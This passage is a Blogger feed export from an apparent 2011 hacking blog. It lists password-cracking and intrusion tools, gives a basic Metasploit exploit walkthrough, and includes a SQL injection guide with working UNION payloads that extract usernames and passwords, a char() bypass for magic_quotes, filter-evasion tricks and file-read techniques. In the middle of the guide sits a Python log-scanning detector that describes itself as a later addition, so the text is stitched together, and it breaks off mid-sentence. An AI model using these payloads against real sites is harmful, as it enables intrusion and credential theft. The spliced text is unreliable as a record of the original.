1. Cain &amp;amp; Abel - Cain &amp;amp; Abel is a password recovery tool for the Microsoft Windows Operating System. It allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.&lt;br /&gt;
&lt;br /&gt;
2. SuperScan - SuperScan is a powerful TCP port scanner, pinger,  resolver. SuperScan 4 (Current Version) is a completely-rewritten update  of the highly popular Windows port scanning tool, SuperScan.&lt;br /&gt;
&lt;br /&gt;
3. GFI LANguard Network Security Scanner - GFI LANguard N.S.S. is a  network vulnerability management solution that scans your network and  performs over 15,000 vulnerability assessments. It identifies all  possible security threats and provides you with tools to patch and  secure your network. GFI LANguard N.S.S. was voted Favorite Commercial  Security Tool by NMAP users for 2 years running and has been sold over  200,000 times!&lt;br /&gt;
&lt;br /&gt;
4. PWDumpX v1.1 - This tool allows a user with administrative privileges  to retrieve the domain password cache, the password hashes and the LSA  secrets from a Windows system. This tool can be used on the local system  or on one or more remote systems.&lt;br /&gt;
&lt;br /&gt;
5. Dark Elevator - This tool is a Windows privilege escalation tool. It  has two main modes, running as a standard user, it tries to find a way  to Admin or System access on a box. In audit mode, it runs as admin and  tries to find ways for a specific user to escalate their privileges.&lt;br /&gt;
&lt;br /&gt;
6. GetAcct - An oldie, but still useful on Pen Tests. GetAcct sidesteps  "RestrictAnonymous=1" and acquires account information on Windows  NT/2000/XP/2003 machines.&lt;br /&gt;
&lt;br /&gt;
7. Solarwinds - Solarwinds contains many network monitoring, discovery and attack tools. The advanced security tools not only test internet security with the SNMP Brute Force Attack and Dictionary Attack utilities but also validate the security on Cisco Routers with the Router Security Check. The Remote TCP Reset remotely displays all active sessions on a device and the Password Decryption can decrypt Type 7 Cisco Passwords. The Port Scanner allows testing for open TCP ports across IP Address and port ranges or selection of specific machines and ports.&lt;br /&gt;
&lt;br /&gt;
8. Burp Suite - Burp Suite is an integrated platform for attacking web  applications. It contains all of the Burp tools with numerous interfaces  between them designed to facilitate and speed up the process of  attacking an application. All tools share the same robust framework for  handling HTTP requests, authentication, downstream proxies, logging,  alerting and extensibility.&lt;br /&gt;
&lt;br /&gt;
9. CookieDigger - CookieDigger helps identify weak cookie generation and  insecure implementations of session management by web applications. The  tool works by collecting and analyzing cookies issued by a web  application for multiple users. The tool reports on the predictability  and entropy of the cookie and whether critical information, such as user  name and password, are included in the cookie values.&lt;br /&gt;
&lt;br /&gt;
10. Netcat (The Network Swiss Army Knife) - Netcat was originally a Unix utility which reads and writes data across network connections, using the TCP or UDP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.&lt;div class="feedflare"&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/7707361972811343646/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/top-10-windows-tools.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/7707361972811343646?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/7707361972811343646?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/top-10-windows-tools.html" title="Top 10 Windows Tools" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;DUUNQXwzfyp7ImA9WhdWFko.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-2220027417553978128</id><published>2011-09-10T23:24:00.000+05:30</published><updated>2011-09-10T23:24:50.287+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-10T23:24:50.287+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Ubuntu" /><title>Top 10 Linux Tools</title><content type="html">&lt;center&gt;&lt;strong&gt;&lt;u&gt;Top 10 Linux Tools&lt;/u&gt;&lt;/strong&gt;&lt;/center&gt;&lt;br /&gt;
1. nmap - Nmap ("Network Mapper") is a free open source utility for  network exploration or security auditing. It was designed to rapidly  scan large networks, although it works fine against single hosts. Nmap  uses raw IP packets in novel ways to determine what hosts are available  on the network, what services (application name and version) those hosts  are offering, what operating systems (and OS versions) they are  running, what type of packet filters/firewalls are in use, and dozens of  other characteristics. Nmap runs on most types of computers and both  console and graphical versions are available.&lt;br /&gt;
&lt;br /&gt;
2. Nikto - Nikto is an Open Source (GPL) web server scanner which  performs comprehensive tests against web servers for multiple items,  including over 3200 potentially dangerous files/CGIs, versions on over  625 servers, and version specific problems on over 230 servers. Scan  items and plugins are frequently updated and can be automatically  updated (if desired).&lt;br /&gt;
&lt;br /&gt;
3. THC-Amap - Amap is a next-generation tool for assisting network penetration testing. It performs fast and reliable application protocol detection, independent of the TCP/UDP port they are bound to.&lt;br /&gt;
&lt;br /&gt;
4. Ethereal - Ethereal is used by network professionals around the world  for troubleshooting, analysis, software and protocol development, and  education. It has all of the standard features you would expect in a  protocol analyzer, and several features not seen in any other product.&lt;br /&gt;
&lt;br /&gt;
5. THC-Hydra - Number one among the biggest security holes are passwords, as every password security study shows. Hydra is a parallelized login cracker which supports numerous protocols to attack. New modules are easy to add; besides that, it is flexible and very fast.&lt;br /&gt;
&lt;br /&gt;
6. Metasploit Framework - The Metasploit Framework is an advanced  open-source platform for developing, testing, and using exploit code.  This project initially started off as a portable network game and has  evolved into a powerful tool for penetration testing, exploit  development, and vulnerability research.&lt;br /&gt;
&lt;br /&gt;
7. John the Ripper - John the Ripper is a fast password cracker,  currently available for many flavors of Unix (11 are officially  supported, not counting different architectures), DOS, Win32, BeOS, and  OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides  several crypt(3) password hash types most commonly found on various Unix  flavors, supported out of the box are Kerberos AFS and Windows  NT/2000/XP/2003 LM hashes, plus several more with contributed patches.&lt;br /&gt;
&lt;br /&gt;
8. Nessus - Nessus is the world's most popular vulnerability scanner  used in over 75,000 organisations world-wide. Many of the world's  largest organisations are realising significant cost savings by using  Nessus to audit business-critical enterprise devices and applications.&lt;br /&gt;
&lt;br /&gt;
9. IRPAS - Internetwork Routing Protocol Attack Suite - Routing  protocols are by definition protocols, which are used by routers to  communicate with each other about ways to deliver routed protocols, such  as IP. While many improvements have been done to the host security  since the early days of the Internet, the core of this network still  uses unauthenticated services for critical communication.&lt;br /&gt;
&lt;br /&gt;
10. Rainbowcrack - RainbowCrack is a general purpose implementation of Philippe Oechslin's faster time-memory trade-off technique. In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker tries all possible plaintexts one by one at cracking time. It is time consuming to break complex passwords in this way. The idea of the time-memory trade-off is to do all the cracking-time computation in advance and store the result in files, the so-called "rainbow table".&lt;div class="feedflare"&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/2220027417553978128/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/top-10-linux-tools.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/2220027417553978128?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/2220027417553978128?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/top-10-linux-tools.html" title="Top 10 Linux Tools" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;DUYDQ3o_eip7ImA9WhdWFko.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-7371739864853382229</id><published>2011-09-10T23:22:00.002+05:30</published><updated>2011-09-10T23:22:52.442+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-10T23:22:52.442+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="system hacking" /><title>Metasploit Tutorial (basics)</title><content type="html">This is a tutorial for a program called metasploit. You can download the program here: &lt;a href="http://www.metasploit.com/" target="_blank" title="http://www.metasploit.com/"&gt;http://www.metasploit.com/&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
After the download you must perform an online update. Then you can either run the web version or the GUI. Next you have to show the exploits and choose one; then you will type: use (exploit)&lt;br /&gt;
&lt;br /&gt;
Then you have to change a few options. So type show options, and you then have to set the RHOST to whatever the computer's IP is. Then you have to set the RPORT to an open port. Then there will be targets to set, like this.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="quote"&gt;set RHOST 189.829.13.19&lt;br /&gt;
set RPORT 27&lt;br /&gt;
set target (OS)&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
The OSs will be displayed.&lt;br /&gt;
&lt;br /&gt;
Next you have to use the check command. All you do is type check. This  will tell you if this works or not. (sometimes it cannot be displayed)&lt;br /&gt;
&lt;br /&gt;
Next you type show payloads. Then you will choose a payload to use like this.&lt;br /&gt;
&lt;br /&gt;
set payload (to what ever option you want to use)&lt;br /&gt;
&lt;br /&gt;
Then you must show options again. You should get other options like LHOST and LPORT; these go with your computer, and you set them the same way as the RHOST and RPORT. So this is what you will need to do.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="quote"&gt;set LHOST (your ip address)&lt;br /&gt;
set LPORT (an open port on your computer)&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Then you will perform the exploit.&lt;br /&gt;
&lt;br /&gt;
So to wrap this up you will do these commands.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="quote"&gt;show exploits&lt;br /&gt;
use (exploit)&lt;br /&gt;
show options&lt;br /&gt;
set RHOST&lt;br /&gt;
set RPORT&lt;br /&gt;
show payloads&lt;br /&gt;
set payload&lt;br /&gt;
show options&lt;br /&gt;
set LHOST&lt;br /&gt;
set LPORT&lt;br /&gt;
exploit&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://jaguargeek.blogspot.com/feeds/7371739864853382229/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/metasploit-tutorial-basics.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/7371739864853382229?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3749417081738719676/posts/default/7371739864853382229?v=2" /><link rel="alternate" type="text/html" href="http://jaguargeek.blogspot.com/2011/09/metasploit-tutorial-basics.html" title="Metasploit Tutorial (basics)" /><author><name>alphajatin</name><uri>http://www.blogger.com/profile/18215607019961941523</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="22" src="http://3.bp.blogspot.com/-W7BcgsI2r3Q/TWXKkq2V1NI/AAAAAAAAACI/dlla8CM4IMw/s220/161511_1019201717_4315499_n.jpg" /></author><thr:total>0</thr:total></entry><entry gd:etag="W/&quot;DEAAQXw9eip7ImA9WhdWFko.&quot;"><id>tag:blogger.com,1999:blog-3749417081738719676.post-2736971915398911239</id><published>2011-09-10T23:15:00.000+05:30</published><updated>2011-09-10T23:15:40.262+05:30</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-09-10T23:15:40.262+05:30</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="web security" /><title>The Complete Guide to SQL Injections</title><content type="html">&lt;div class="gradient1"&gt;&lt;h2&gt;What is SQL Injection&lt;/h2&gt;&lt;/div&gt;&lt;h2&gt;&lt;hr /&gt;&lt;/h2&gt;SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer  of an application. 
The vulnerability is present when user input is either incorrectly filtered for string literal escape  characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an  instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is  embedded inside another.    &lt;br /&gt;
&lt;div class="gradient1"&gt;&lt;h2&gt;0x00 - Intro&lt;/h2&gt;&lt;/div&gt;&lt;h2&gt;&lt;hr /&gt;&lt;/h2&gt;All the information contained in the article is from personal  experience, if I don't go over something that you currently do or have  seen  in SQL injections, its because I do not use it; not saying I'm right  just that's how it is. As you should already know, extracting database   information from a server without administration approval is illegal and  I cannot be held accountable for any malicious actions executed after  reading this acticle.    &lt;br /&gt;
&lt;div class="gradient1"&gt;&lt;h2&gt;0x01 - What is MySQL&lt;/h2&gt;&lt;/div&gt;&lt;h2&gt;&lt;hr /&gt;&lt;/h2&gt;"SQL" stands for "Structed Query Language," which simply allows users to  send queries to the server database.  There are different types of SQL such as MSSQL, which is Microsoft's  version of the language and also has some different commands as well  as syntax.    &lt;br /&gt;
&lt;div class="gradient1"&gt;&lt;h2&gt;0x02 - Finding SQL Injections&lt;/h2&gt;&lt;/div&gt;&lt;h2&gt;&lt;hr /&gt;&lt;/h2&gt;Before jumping into this topic I want to explain to you about comments  in MySQL. There are three variations to a comment in this language: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt;--&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt;/*&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt;#&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
As you should already know, a comment just blocks out a section so it will not be executed through the query. Typically, anytime you see a page from a website that takes in a parameter such as: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt;?id=&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt;?category_id=&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt;?user_id=&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
(not saying injections are narrowed down to only id parameters but they  are quite common) you may want to test the page for a vulnerability.  The simplest way I know of to check for a vulnerability is to add: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt;" and 1=1--&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
to the end of the URL and see if the contents of the page change, even the slightest bit; if they don't, then add &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt; " and 1=0--&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
(it doesn't have to be 1=1 or 1=0, just something that returns true for the first statement and false for the second) and see if it changes after the second. If the contents change after the second query then you have a vulnerability.    &lt;br /&gt;
&lt;div class="gradient1"&gt;&lt;h2&gt;0x03 - Gathering Information&lt;/h2&gt;&lt;/div&gt;&lt;h2&gt;&lt;hr /&gt;&lt;/h2&gt;To make your job or life a little easier you should look around the site some to gather information on what you are trying to retrieve. For instance, if the site has a user registration, look at the source code for the page and take note of the field names they use (most developers are lazy and use the same names for simplicity); you can also look around the site for more vulnerabilities. Alright, so once you have found some good information to look forward to, it's time to find out how many columns are being selected from the database by the original query. This is an important step because if the number of columns you "select" and the number from the original are not identical, the injection does not work! To find out the number of columns you simply add "order by x" on the end of your vulnerable URL, replacing "x" with an increasing number until you get an error: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt;http://www.site.com/vulnerable.php?id=4 order by 9--&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
the number of columns being selected is the value of x before the error.    &lt;br /&gt;
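The probes described in sections 0x02 and 0x03 leave a recognisable trail in web server logs. The following detection sketch is an added example, not part of the original article; the log lines are constructed, and the function name, labels and threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (common log format, documentation-range addresses).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Sep/2011:23:15:01 +0530] "GET /vulnerable.php?id=4 HTTP/1.1" 200 5120
198.51.100.7 - - [10/Sep/2011:23:15:09 +0530] "GET /vulnerable.php?id=4%22%20and%201=1-- HTTP/1.1" 200 5120
198.51.100.7 - - [10/Sep/2011:23:15:12 +0530] "GET /vulnerable.php?id=4%22%20and%201=0-- HTTP/1.1" 200 812
198.51.100.7 - - [10/Sep/2011:23:15:20 +0530] "GET /vulnerable.php?id=4+order+by+1-- HTTP/1.1" 200 5120
198.51.100.7 - - [10/Sep/2011:23:15:21 +0530] "GET /vulnerable.php?id=4+order+by+4-- HTTP/1.1" 200 5120
198.51.100.7 - - [10/Sep/2011:23:15:23 +0530] "GET /vulnerable.php?id=4+order+by+5-- HTTP/1.1" 500 230
203.0.113.20 - - [10/Sep/2011:23:16:02 +0530] "GET /search.php?q=stand+by+me+and+order+by+mail HTTP/1.1" 200 3000
192.0.2.44 - - [10/Sep/2011:23:17:40 +0530] "GET /vulnerable.php?id=-1%20UNION%20ALL%20SELECT%201,2,3,4-- HTTP/1.1" 200 640
"""

LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[0-9.]+" (\d{3}) (\d+)$'
)
# "and N=M" followed by one of the three comment markers the article lists.
BOOL_RE = re.compile(r"\band\s+(\d+)\s*=\s*(\d+)\s*(?:--|#|/\*)", re.I)
# "order by" followed by a column index (a word such as "mail" does not match).
ORDER_RE = re.compile(r"\border\s+by\s+(\d+)", re.I)
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)

MIN_ORDER_STEPS = 3  # assumed threshold: distinct indexes tried on one page


def scan(log_text):
    """Return {(client, path): sorted list of finding labels}."""
    bool_sizes = defaultdict(dict)   # (client, path) -> {True/False: response size}
    order_steps = defaultdict(set)   # (client, path) -> ORDER BY indexes tried
    findings = defaultdict(set)
    for line in log_text.splitlines():
        match = LINE_RE.match(line)
        if match is None:
            continue
        client, target, size = match.group(1), match.group(2), int(match.group(4))
        parts = urlsplit(target)
        key = (client, parts.path)
        query = unquote_plus(parts.query)  # decode %20 and + before matching
        probe = BOOL_RE.search(query)
        if probe:
            outcome = int(probe.group(1)) == int(probe.group(2))
            bool_sizes[key][outcome] = size
        order_steps[key].update(int(n) for n in ORDER_RE.findall(query))
        if UNION_RE.search(query):
            findings[key].add("union-select")
    for key, sizes in bool_sizes.items():
        # A true probe and a false probe from one client on one page is the
        # test pair; differing response sizes mean the page reacted to it.
        if True in sizes and False in sizes:
            differs = sizes[True] != sizes[False]
            findings[key].add(
                "boolean-pair-response-differs" if differs else "boolean-pair"
            )
    for key, steps in order_steps.items():
        if len(steps) >= MIN_ORDER_STEPS:
            findings[key].add("order-by-enumeration")
    return {key: sorted(labels) for key, labels in findings.items()}


if __name__ == "__main__":
    for (client, path), labels in scan(SAMPLE_LOG).items():
        print(client, path, ", ".join(labels))
```

A boolean pair whose two responses differ in size deserves the highest triage priority, because it means the page behaved the way the test in 0x02 expects of a vulnerable one.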
&lt;div class="gradient1"&gt;&lt;h2&gt;0x04 - The Injection&lt;/h2&gt;&lt;/div&gt;&lt;h2&gt;&lt;hr /&gt;&lt;/h2&gt;I suppose this is where some people get confused. In MySQL in order to  combine two query statements you can use the keyword "union",  you can also include the keyword "all" which will dislay all results  (default property of union is to remove duplicate results from display).   After your "union all" you also need to inlcude the keyword "select"  since we are going to want to select database information and display it   on the screen so far you should be looking at something similar to: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt;http://www.site.com/vulnerable.php?id=4 union all select&lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
Continuing the injection like the previous example will work fine, but it will also display all the original results as well as our new results. Typically, to bypass this I, as well as most of the other people exploiting SQL injections, replace the id value, which in the case of our example would be 4, with one of the following: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt; -1 &lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt;null&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
or any result that would not be in the database; this way the original select query will not return anything but our new injected select query will display. In SQL each column being selected must be separated by a comma (,), so if your vulnerable site is selecting 4 columns with the original statement (which was found earlier when we were gathering information using the "order by") you would just concatenate those on your injection; I like to set each column to a different numeric value, that way I can keep track of which columns are actually being displayed on the screen. So far, if everything has been going OK, you should have an injection URL looking something like: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt;http://www.site.com/vulnerable.php?id=-1 union all select 1,2,3,4-- &lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
If not, then go back and keep reading it until you figure it out. The last part of our injection setup is telling the query which table to "select" the information from; we do this with the keyword "from table"...pretty self-explanatory, right? So for example, if we have a vulnerable site that has 4 columns being selected and we want to look at the "users" table, we can have a setup such as: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt;http://www.site.com/vulnerable.php?id=-1 union all select 1,2,3,4 from users--&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
Easy enough so far, now is where it gets a little more difficult, but not too much.    &lt;br /&gt;
&lt;div class="gradient1"&gt;&lt;h2&gt;0x05 - Tables and Columns&lt;/h2&gt;&lt;/div&gt;&lt;h2&gt;&lt;hr /&gt;&lt;/h2&gt;Depending on the version of MySQL the administrators are running on the  server, finding table and column names can be very easy or somewhat irritating. There is an easy way to figure out what version  is running on the server, can you guess? If you did not guess version(), why the hell not, its like one of the easiest and self  explanitory things ever! Anyways, replace one of the columns in your injection that displays on the screen with the function call  version() and this will tell you which typically its either 4.x.x or  5.x.x.  If they are running some form of version 4 then you're basically on your  own when it comes to figuring out table and column names (i'll post  some  examples of common names later); though if version 5 is implemented then  your life is easy. As of version 5.1 of MySQL the developers began to  automatically include a master database on the server called  INFORMATION_SCHEMA. Within information_schema there are tables that give  information  about all the tables, columns, users, etc on the entire sql server (to  find more about the structure of information_schema and the table/column  names  visit &lt;a href="http://dev.mysql.com/doc/refman/5.0/en/information-schema.html%29." target="_blank" title="autolink"&gt;http://dev.mysql.com/doc/refman/5.0/en/information-schema.html).&lt;/a&gt;  Once you figure out a table name and some column names within that  table  you want to look at just place them into our injection setup from  before; suppose we have a site that has  a "users" table and columns "user" and "pass" and the second and third  columns are displayed onto the screen, we could view these by an  injection such as: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt; &lt;a href="http://www.site.com/vulnerable.php?id=-1" target="_blank" title="autolink"&gt;http://www.site.com/vulnerable.php?id=-1&lt;/a&gt; union all select 1,user, pass, 4 from users-- &lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
This example will display both the user and pass onto the screen in the given positions, though what happens if only one column is selected or displayed? In MySQL there is a function called concat() which simply concatenates fields together, so to simplify our previous example we could have: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt; &lt;a href="http://www.site.com/vulnerable.php?id=-1" target="_blank" title="autolink"&gt;http://www.site.com/vulnerable.php?id=-1&lt;/a&gt; union all select 1, concat(user,0x3a, pass), 3, 4 from users-- &lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
"0x3A" is just a colon (:) in hexadecimal, simply to separate the two fields for my own viewing. &lt;br /&gt;
&lt;br /&gt;
&lt;div class="gradient1"&gt;&lt;h2&gt;0x06 - Narrowing down the Selection&lt;/h2&gt;&lt;/div&gt;&lt;h2&gt;&lt;hr /&gt;&lt;/h2&gt;Typically when performing a SQL injection there are multiple results you want to look at or possibly just one individual. There are a couple of ways to narrow down your selection. The first way is to use the "where" keyword; it just takes a logical parameter such as "where id=1" which would look in the id column in the table and find which row is equal to 1. The next way is to use the "limit" keyword; this way is a little more useful since you do not need to know an additional column name to increment through the selections. limit takes two parameters, where to start the selection and how many to select. So in order to select only the very first "user" from the table "users" using the "limit" keyword you could have: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt; &lt;a href="http://www.site.com/vulnerable.php?id=-1" target="_blank" title="autolink"&gt;http://www.site.com/vulnerable.php?id=-1&lt;/a&gt; union all select user from users limit 0,1--  &lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
To look at the rest of the users individually you just increment the 0 up until you get an error. In order to look at all the results in a single swipe you can use the function group_concat() which works very similarly to concat() except it displays all the results for the given column(s) separated by a comma (,) (the comma is just the default, you can change it by using the "separator" keyword and indicate a symbol to use). &lt;br /&gt;
&lt;div class="gradient1"&gt;&lt;h2&gt;0x07 - Obstacles&lt;/h2&gt;&lt;/div&gt;&lt;h2&gt;&lt;hr /&gt;&lt;/h2&gt;Excluding the fact that version 4 in general is an obstacle, there are a few different things web developers can do to try and make SQL injections a little more difficult. The most common of these annoyances would be magic_quotes; basically magic quotes disallows any type of quotation marks and breaks them by adding a back-slash (\), which of course is going to mess up your injection. To get around this there is the nice little function char(); char() takes ASCII values and generates the corresponding character value, thus eliminating the need for a quote. Example time...say we want to look at the "pass" column FROM the table "users" but only WHERE the "user" column is equal to "admin" and the site only selects one column from the original query, easy enough right? We learned this earlier: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt; &lt;a href="http://www.site.com/vulnerable.php?id=-1" target="_blank" title="autolink"&gt;http://www.site.com/vulnerable.php?id=-1&lt;/a&gt; union all select pass from users where user="admin"--  &lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
Curve ball! The developers have enabled magic_quotes, therefore your "admin" will not work properly...I know, it's sad. To fix it we simply take the ASCII values of each character (http://crashoverron.t35.com/ascii.php) so now we get: &lt;br /&gt;
&lt;br /&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;code&gt; &lt;a href="http://www.site.com/vulnerable.php?id=-1" target="_blank" title="autolink"&gt;http://www.site.com/vulnerable.php?id=-1&lt;/a&gt; union all select pass from users where user=char(97,100,109,105,110)--  &lt;/code&gt; &lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
TA-DA! injection fixed. Also another safety feature they try to block us  with is regular expressions to search our input, but often times  they have their expressions set to such narrow possibilities that you  can bypass them by simply changing the case, the comment symbol, or  replacing spaces with "+" (SQL is not case sensitive, it also sees "+"  as a space filler much like a space).    &lt;br /&gt;
&lt;div class="gradient1"&gt;&lt;h2&gt;0x08 - Additional opportunities&lt;/h2&gt;&lt;/div&gt;&lt;h2&gt;&lt;hr /&gt;&lt;/h2&gt;Although I said before version 4 was a pain in the ass, I have also noticed a nice feature common to version 4 vulnerable sites I have come across in my adventures; this feature would be the function load_file(), not saying the function is exclusive to version 4 but from my experience it is most commonly enabled for current users by developers for some reason in this version. load_file() acts just as file_get_contents() from PHP in that it returns the contents of the file into a string format. If enabled this allows for more than just SQL-style hacks on the server, it now allows for LFI vulnerabilities as well. However, load_file() needs to have the exact full path to the file you are trying to open, for example: /home/CrashOverron/Desktop/file, and if input as a literal string then it must be encased in quotes, which brings back the issue of magic_quotes, but as before just use the char() function. The next interesting feature that is hardly ever possible, but I have seen happen, is the use of the "INTO OUTFILE" keywords. This is the exact opposite of load_file(); in order to use either of these features the current user that MySQL is running as must have the FILE privilege on the server. Again, the full path 